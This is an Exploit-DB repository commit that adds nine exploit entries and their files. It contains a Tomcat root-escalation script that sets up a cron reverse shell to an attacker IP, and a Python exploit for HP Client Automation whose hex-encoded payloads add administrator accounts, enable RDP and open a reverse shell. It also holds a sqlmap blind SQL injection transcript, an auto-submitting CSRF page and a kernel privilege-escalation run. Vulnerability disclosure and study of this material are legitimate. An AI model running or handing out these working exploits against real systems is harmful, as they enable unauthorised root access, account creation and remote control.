DB: 2016-10-11

9 new exploits

ShoreTel Connect ONSITE - Blind SQL Injection
Leap Service - Unquoted Service Path Privilege Escalation
Wacom Consumer Service - Unquoted Service Path Privilege Escalation
Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation
Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation
Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation
HP Client - Automation Command Injection / Remote Code Execution
Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)
This commit is contained in:
Offensive Security 2016-10-11 05:01:15 +00:00
parent 8ea4614148
commit a3dbf3113e
10 changed files with 889 additions and 0 deletions

View file

@ -36598,6 +36598,15 @@ id,file,description,date,author,platform,type,port
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
40481,platforms/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",php,webapps,0
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40483,platforms/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,42 @@
# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call
# Date: 2016.10.8
# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360
# Version: Linux kernel <= 4.6.2
# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic
# CVE: CVE-2016-4997
# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10
# Contact: tyrande000@gmail.com
#DESCRIPTION
#===========
#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,
#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls
compile.sh enjoy enjoy.c pwn pwn.c version.h
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables
[sudo] password for zhang_q:
zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
got root, enjoy :)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl
Static hostname: ubuntu
Icon name: computer-vm
Chassis: vm
Machine ID: 355cdf4ce8a048288640c2aa933c018f
Virtualization: vmware
Operating System: Ubuntu 16.04.1 LTS
Kernel: Linux 4.4.0-21-generic
Architecture: x86-64
root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE#
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip

283
platforms/linux/local/40488.txt Executable file
View file

@ -0,0 +1,283 @@
=============================================
- Discovered by: Dawid Golunski
- http://legalhackers.com
- dawid (at) legalhackers.com
- CVE-2016-5425
- Release date: 10.10.2016
- Revision: 1
- Severity: High
=============================================
I. VULNERABILITY
-------------------------
Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation
II. BACKGROUND
-------------------------
"The Apache Tomcatî software is an open source implementation of the
Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket
technologies. The Java Servlet, JavaServer Pages, Java Expression Language
and Java WebSocket specifications are developed under the Java Community
Process.
The Apache Tomcat software is developed in an open and participatory
environment and released under the Apache License version 2.
The Apache Tomcat project is intended to be a collaboration of the
best-of-breed developers from around the world.
Apache Tomcat software powers numerous large-scale, mission-critical web
applications across a diverse range of industries and organizations.
Some of these users and their stories are listed on the PoweredBy wiki page.
"
http://tomcat.apache.org/
III. INTRODUCTION
-------------------------
Apache Tomcat packages provided by default repositories of RedHat-based
distributions (including CentOS, RedHat, OracleLinux, Fedora, etc.)
create a tmpfiles.d configuration file with insecure permissions which
allow attackers who are able to write files with tomcat user permissions
(for example, through a vulnerability in web application hosted on Tomcat)
to escalate their privileges from tomcat user to root and fully compromise
the target system.
IV. DESCRIPTION
-------------------------
The vulnerability stems from the tomcat.conf file installed by default
by packages on RedHat-based systems with write permissions for the tomcat
group:
[root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf
-rw-rw-r--. 1 root tomcat 361 Oct 9 23:58 /usr/lib/tmpfiles.d/tomcat.conf
The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage
temporary files including their creation.
Attackers could very easily exploit the weak permissions on tomcat.conf to
inject configuration that creates a rootshell or remote reverse shell that
allows them to execute arbitrary commands with root privileges.
Injected malicious settings would be processed whenever
/usr/bin/systemd-tmpfiles gets executed.
systemd-tmpfiles is executed by default on boot on RedHat-based systems
through systemd-tmpfiles-setup.service service as can be seen below:
---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]---
[...]
ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
----------------------------------------------------------------
Depending on the system in use, the execution of systemd-tmpfiles could also
be triggered by other services, cronjobs, startup scripts etc.
The vulnerability could potentially get exploited by remote attackers in
combination with a vulnerable web application hosted on Tomcat if they
managed to find a path traversal (e.g in a file upload feature) or an arbitrary
file write/append vulnerability. This would allow them to append settings
to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root
privileges without a prior local access/shell on the system.
This vector could prove useful to attackers, for example if they were unable to
obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a
vulnerable file upload feature due to restrictions imposed by Tomcat security
manager, or a read-only webroot etc.
It is worth to note that systemd-tmpfiles does not stop on syntax errors when
processing configuration files which makes exploitation easier as attackers only
need to inject their payload after a new line and do not need to worry
about garbage data potentially prepended by a vulnerable webapp in case of
Arbitrary File Write/Append exploitation.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
-----------[ tomcat-RH-root.sh ]---------
#!/bin/bash
# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit
# CVE-2016-5425
#
# Full advisory at:
# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
#
# Discovered and coded by:
# Dawid Golunski
# http://legalhackers.com
#
# Tested on RedHat, CentOS, OracleLinux, Fedora systems.
#
# For testing purposes only.
#
ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9090
echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *"
echo -e " Discovered by Dawid Golunski\n"
echo "[+] Checking vulnerability"
ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'
if [ $? -ne 0 ]; then
echo "Not vulnerable or tomcat installed under a different user than 'tomcat'"
exit 1
fi
echo -e "\n[+] Your system is vulnerable!"
echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..."
cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n"
_eof_
echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:"
cat /usr/lib/tmpfiles.d/tomcat.conf
echo -e "\n[+] Payload injected! Wait for your root shell...\n"
echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n"
--------------[ eof ]--------------------
Example run:
-bash-4.2$ rpm -qa | grep -i tomcat
tomcat-7.0.54-2.el7_1.noarch
-bash-4.2$ cat /etc/redhat-release
CentOS Linux release 7.2.1511 (Core)
-bash-4.2$ id
uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
-bash-4.2$ ./tomcat-RH-root.sh
* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *
Discovered by Dawid Golunski
[+] Checking vulnerability
-rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf
[+] Your system is vulnerable!
[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf...
[+] /usr/lib/tmpfiles.d/tomcat.conf contains:
f /var/run/tomcat.pid 0644 tomcat tomcat -
C /usr/share/tomcat/rootsh 4770 root root - /bin/bash
z /usr/share/tomcat/rootsh 4770 root root -
F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n"
[+] Payload injected! Wait for your root shell...
Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090
-bash-4.2$ nc -l -p 9090
bash: no job control in this shell
[root@centos7 ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@centos7 ~]# ls -l /usr/share/tomcat/rootsh
ls -l /usr/share/tomcat/rootsh
-rwsrwx---. 1 root root 960392 Aug 2 12:00 /usr/share/tomcat/rootsh
[root@centos7 ~]#
VI. BUSINESS IMPACT
-------------------------
Attackers who have gained access to tomcat user account or the ability to
write files as tomcat user could escalate their privileges to root and fully
compromise the affected system.
As explained in section IV., the vulnerability could potentially get exploited
by remote attackers in combination with certain web application vulnerabilities
to achieve command execution without prior shell access.
VII. SYSTEMS AFFECTED
-------------------------
Multiple versions of Tomcat packages on RedHat-based systems are affected.
The vulnerability was confirmed on Tomcat installed from default repositories
on the following systems:
- CentOS
- Fedora
- Oracle Linux
- RedHat
Refer to information provided by your distribution to obtain an exact list
of vulnerable packages.
Detailes provided by RedHat can be found at:
https://access.redhat.com/security/cve/CVE-2016-5425
VIII. SOLUTION
-------------------------
Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write
permission for the tomcat group.
Alternatively, update to the latest packages provided by your distribution.
Confirm the file permissions after the update.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
The source code of the exploit (tomcat-RH-root.sh) can be downloaded from:
http://legalhackers.com/exploits/tomcat-RH-root.sh
CVE-2016-5425
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425
https://access.redhat.com/security/cve/CVE-2016-5425
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
10.10.2016 - Advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.

View file

@ -0,0 +1,212 @@
# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]
#Can run following commands on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
#Runs following commands on Windows target
#hide hide cmd.exe /c net user hack3r "hack3r" /add
#hide hide cmd.exe /c net localgroup administrators hack3r /add
#hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
#hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
#hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
#hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
import sys,socket
print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")
def exploit_Linux(target_IP,exploit_param):
if exploit_param == "1":
print("\n[+]Adding privileged user amiroot/nopass")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user amiroot/nopass")
else:
print("[-]Failed to add user amiroot/nopass")
s.close()
elif exploit_param == "2":
print("\n[+]Trying to get a reverse shell")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
#Change this
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
else:
print("[-]Failed to get reverse shell")
s.close()
else:
print("\n[-]Invalid exploit parameter provided for Linux target")
sys.exit()
def exploit_Windows(target_IP):
counter = 0
print("[+]Adding a local user hack3r/hack3r")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user hack3r/hack3r")
counter+= 1
else:
print("[-]Failed to add user hack3r/hack3r")
s.close()
print("[+]Adding user 'hack3r' to Local Administrator's group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user 'hack3r' to Local Administrators group")
counter+= 1
else:
print("[-]Failed to add user to 'hack3r' Local Administrators group")
s.close()
#Add user Hack3r to "Remote Desktop Users" Group
print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
counter+= 1
else:
print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
s.close()
#Enable RDP
print("[+]Trying to enable Remote Desktop Service")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service")
s.close()
#Enable RDP for all profiles
print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
counter+= 1
else:
print("[-]Failed to enable Remote Desktop Service for all firewall profiles")
s.close()
#Setup target to listen for RDP connections
print("[+]Setting up the target server to listen to RDP connections")
request = "\x00"
request+= "\x31\x32\x33\x31\x32\x33\x00"
request+= "\x41\x42\x43\x00"
request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_IP, 3465))
s.send(request)
response = s.recv(1024)
if response == "\x00":
print("[+]Successfully setup the target server to listen to RDP connections")
counter+= 1
else:
print("[-]Failed to setup the target server to listen to RDP connections")
s.close()
if counter == 6:
print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
else:
print("\n[-]Exploit Failed..")
#main() function here
def main():
if len(sys.argv) < 2:
print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"
sys.exit()
target_IP = sys.argv[1]
target_OS = sys.argv[2].lower()
if target_OS == "windows":
exploit_Windows(target_IP)
elif target_OS == "linux":
exploit_param = sys.argv[3]
exploit_Linux(target_IP,exploit_param)
else:
print("\n[-]Invalid taret Operating System selected.")
sys.exit()
if __name__ == '__main__':
main()

87
platforms/php/webapps/40481.txt Executable file
View file

@ -0,0 +1,87 @@
# Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability
# Date: 19-09-2016
# Software Link:
https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
# Exploit Author: Iraklis Mathiopoulos
# Contact: https://twitter.com/_imath_
# Website: https://medium.com/@iraklis
# Category: webapps
1. Description
Versions of ShoreTel Connect ONSITE prior and including 21.79.4311.0
are vulnerable to a Blind SQL Injection in /authenticate.php, on the webserver
that is running the Conference system.
Specifically, the POST parameter "username" is not sanitised prior to being used
in SQL Queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20
for the username value the server will respond after approximately 35 seconds.
No authentication is needed in order to exploit the vulnerability as the issue
resides in the pre-authentication realm of the system.
2. Proof of Concept
req.burp:
---
POST https://[REDACTED].com/authenticate.php HTTP/1.1
Host: [REDACTED].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852
Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw%3D%3D&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123&vpassword=&SUBMIT1=Sign+In
- ---
root@kali:~/projects# sqlmap -r req.burp -p username --dbms=mysql
--technique=T --time-sec=10 --level=5 --risk=3 --current-db
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201607120a89}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[*] starting at 19:59:34
[19:59:34] [INFO] parsing HTTP request from 'req.burp'
[19:59:34] [INFO] testing connection to the target URL
[19:59:42] [INFO] checking if the target is protected by some kind of
WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
- ---
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw==&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123'
AND (SELECT * FROM (SELECT(SLEEP(10)))Qlhs) AND 'jIev' LIKE
'jIev&vpassword=&SUBMIT1=Sign In
- ---
[19:59:54] [INFO] testing MySQL
[20:02:25] [INFO] confirming MySQL
[20:03:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[20:03:12] [INFO] fetching current database
[20:03:12] [INFO] retrieved: [REDACTED]
current database: '[REDACTED]'
[20:21:10] [INFO] fetched data logged to text files under
'/root/.sqlmap/output/[REDACTED].com'
[*] shutting down at 20:21:10
3. Solution:
Install the latest version of ShoreTel Connect ONSITE
https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK
Related ShoreTel security bulletin:
https://support.shoretel.com/kb/view.php?id=kA41A000000XgL6SAK

View file

@ -0,0 +1,35 @@
# Exploit Title : Maian Weblog 4.0 - Cross-Site Request
Forgery ( Add New Post)
# Author : Besim
# Google Dork : -
# Date : 10/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.maianweblog.com
# Software link :
http://www.hotscripts.com/listings/jump/download/21864
*########################### CSRF PoC ###############################*
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/mainb/publish/admin/index.php?cmd=add"
method="POST">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="title" value="Murat" />
<input type="hidden" name="comments"
value="Muratttttt&#13;&#10;<br&#32;&#47;>" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
*####################################################################*

View file

@ -0,0 +1,29 @@
Leap service: https://www.leapmotion.com/
By Ross Marks: http://www.rossmarks.co.uk
Exploit-db: https://www.exploit-db.com/author/?a=8724
Category: Local
Tested on: Windows 10 x86/x64
1) Unquoted Service Path Privilege Escalation
Leap motion's "LeapService" installs as a service with an unquoted service path running with SYSTEM privileges.
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
PoC:
C:\>sc qc LeapService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: leapService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
